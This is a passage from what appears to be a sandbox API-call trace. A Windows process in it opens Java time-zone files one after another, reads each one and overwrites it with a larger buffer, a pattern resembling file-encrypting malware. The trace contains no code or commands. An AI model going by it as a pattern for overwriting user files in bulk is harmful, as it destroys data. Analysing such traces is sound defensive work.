cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0136.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Resolute", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Resolute", lpUsedDefaultChar=0x0) returned 8 [0136.329] ReadFile (in: hFile=0x1cc, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x41c, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x359f2bc*=0x41c, lpOverlapped=0x0) returned 1 [0136.349] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.349] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9a4, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0x9a4, lpOverlapped=0x0) returned 1 [0136.349] CloseHandle (hObject=0x1cc) returned 1 [0136.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Sitka" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\sitka"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.350] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.350] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4c8 [0136.350] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.350] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.350] ReleaseMutex (hMutex=0x168) returned 1 [0136.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sitka", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sitka", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sitka", lpUsedDefaultChar=0x0) returned 5 [0136.351] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863f38, nNumberOfBytesToRead=0x4c8, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863f38*, lpNumberOfBytesRead=0x359f2bc*=0x4c8, lpOverlapped=0x0) returned 1 [0136.384] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.385] WriteFile (in: hFile=0x1cc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x359f2d0*=0xa50, lpOverlapped=0x0) returned 1 [0136.385] CloseHandle (hObject=0x1cc) returned 1 [0136.385] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Thule" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\thule"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.386] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.386] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x354 [0136.386] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.387] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.387] ReleaseMutex (hMutex=0x168) returned 1 [0136.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Thule", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Thule", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thule", lpUsedDefaultChar=0x0) returned 5 [0136.387] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e967d8, nNumberOfBytesToRead=0x354, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e967d8*, lpNumberOfBytesRead=0x359f2bc*=0x354, lpOverlapped=0x0) returned 1 [0136.426] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.427] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x8dc, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x359f2d0*=0x8dc, lpOverlapped=0x0) returned 1 [0136.427] CloseHandle (hObject=0x1cc) returned 1 [0136.427] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yakutat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yakutat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.428] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.428] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4c4 [0136.428] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.428] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.429] ReleaseMutex (hMutex=0x168) returned 1 [0136.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yakutat", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.429] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Yakutat", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Yakutat", lpUsedDefaultChar=0x0) returned 7 [0136.429] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a48, nNumberOfBytesToRead=0x4c4, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesRead=0x359f2bc*=0x4c4, lpOverlapped=0x0) returned 1 [0136.447] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.447] WriteFile (in: hFile=0x1cc, lpBuffer=0x28741b8*, nNumberOfBytesToWrite=0xa4c, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28741b8*, lpNumberOfBytesWritten=0x359f2d0*=0xa4c, lpOverlapped=0x0) returned 1 [0136.447] CloseHandle (hObject=0x1cc) returned 1 [0136.447] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Palmer" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\palmer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.448] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.448] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x450 [0136.448] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.448] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.448] ReleaseMutex (hMutex=0x168) returned 1 [0136.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Palmer", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Palmer", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Palmer", lpUsedDefaultChar=0x0) returned 6 [0136.448] ReadFile (in: hFile=0x1cc, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x450, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x359f2bc*=0x450, lpOverlapped=0x0) returned 1 [0136.484] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.484] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9d8, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0x9d8, lpOverlapped=0x0) returned 1 [0136.484] CloseHandle (hObject=0x1cc) returned 1 [0136.484] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.485] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.485] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1c5 [0136.485] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.485] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.485] ReleaseMutex (hMutex=0x168) returned 1 [0136.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aqtau", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aqtau", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Aqtau", lpUsedDefaultChar=0x0) returned 5 [0136.485] ReadFile (in: hFile=0x1cc, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1c5, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x359f2bc*=0x1c5, lpOverlapped=0x0) returned 1 [0136.486] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.486] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x74d, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x74d, lpOverlapped=0x0) returned 1 [0136.486] CloseHandle (hObject=0x1cc) returned 1 [0136.487] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Bishkek" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\bishkek"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.488] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.488] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1e5 [0136.488] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.488] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.488] ReleaseMutex (hMutex=0x168) returned 1 [0136.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bishkek", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bishkek", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bishkek", lpUsedDefaultChar=0x0) returned 7 [0136.488] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1e5, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x359f2bc*=0x1e5, lpOverlapped=0x0) returned 1 [0136.489] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.489] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x76d, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x76d, lpOverlapped=0x0) returned 1 [0136.489] CloseHandle (hObject=0x1cc) returned 1 [0136.489] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dubai" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dubai"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.490] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.490] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x41 [0136.490] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.490] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.490] ReleaseMutex (hMutex=0x168) returned 1 [0136.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dubai", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dubai", cchWideChar=5, lpMultiByteStr=0x1f7ace4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dubai", lpUsedDefaultChar=0x0) returned 5 [0136.491] ReadFile (in: hFile=0x1cc, lpBuffer=0x1fc21d8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc21d8*, lpNumberOfBytesRead=0x359f2bc*=0x41, lpOverlapped=0x0) returned 1 [0136.491] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.491] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0136.492] CloseHandle (hObject=0x1cc) returned 1 [0136.492] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Irkutsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\irkutsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.492] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.492] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x245 [0136.492] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.493] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.493] ReleaseMutex (hMutex=0x168) returned 1 [0136.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Irkutsk", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Irkutsk", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Irkutsk", lpUsedDefaultChar=0x0) returned 7 [0136.493] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x245, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x359f2bc*=0x245, lpOverlapped=0x0) returned 1 [0136.494] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.494] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a8068*, nNumberOfBytesToWrite=0x7cd, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a8068*, lpNumberOfBytesWritten=0x359f2d0*=0x7cd, lpOverlapped=0x0) returned 1 [0136.494] CloseHandle (hObject=0x1cc) returned 1 [0136.494] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kathmandu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kathmandu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.495] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.495] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4d [0136.495] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.495] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.495] ReleaseMutex (hMutex=0x168) returned 1 [0136.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kathmandu", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kathmandu", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kathmandu", lpUsedDefaultChar=0x0) returned 9 [0136.495] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f9fd08, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fd08*, lpNumberOfBytesRead=0x359f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0136.496] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.496] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0136.496] CloseHandle (hObject=0x1cc) returned 1 [0136.497] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Magadan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\magadan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.498] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.499] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x245 [0136.499] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.499] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.499] ReleaseMutex (hMutex=0x168) returned 1 [0136.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Magadan", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Magadan", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Magadan", lpUsedDefaultChar=0x0) returned 7 [0136.499] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x245, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x359f2bc*=0x245, lpOverlapped=0x0) returned 1 [0136.502] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.502] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a8068*, nNumberOfBytesToWrite=0x7cd, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a8068*, lpNumberOfBytesWritten=0x359f2d0*=0x7cd, lpOverlapped=0x0) returned 1 [0136.503] CloseHandle (hObject=0x1cc) returned 1 [0136.503] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Oral" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\oral"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.504] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.504] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1cd [0136.504] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.504] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.504] ReleaseMutex (hMutex=0x168) returned 1 [0136.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Oral", cchWideChar=4, 